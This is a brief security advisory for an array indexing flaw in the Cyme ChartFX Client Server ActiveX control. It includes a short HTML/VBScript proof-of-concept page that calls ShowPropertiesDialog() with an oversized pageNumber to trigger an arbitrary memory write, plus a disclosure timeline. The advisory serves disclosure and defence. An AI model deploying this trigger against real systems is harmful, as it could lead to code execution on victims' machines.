Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability

Summary

Cyme ChartFX Client Server ActiveX Control suffers from array indexing vulnerability

Credit:

The information has been provided by Francis Provencher.


Details

Vulnerable Systems:
 * CYME version 5.0.12.663.

The vulnerability is caused due to an indexing error in the ‘ShowPropertiesDialog()’ method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be exploited to write a single byte value to an arbitrary memory location via the ‘pageNumber’ parameter. Successful exploitation may allow execution of arbitrary code.

The Code

<object classid=’clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C’ id=’target’ />
<script language=’vbscript’>
targetFile = ‘C:CYMECYMDIST50TRIALChartFX.ClientServer.Core.dll’
prototype = ‘Sub ShowPropertiesDialog ( ByVal context As Variant , ByVal pageNumber As Long )’
memberName = ‘ShowPropertiesDialog’
progid = ‘Cfx62ClientServer.Chart’
argCount = 2

arg1=’defaultV’
arg2=2147483647

target.ShowPropertiesDialog arg1 ,arg2

Disclosure Timeline:
2012-03-14 Vulnerability reported to Secunia
2012-10-03 Publication of this advisory (180 Days)

Categories: Exploits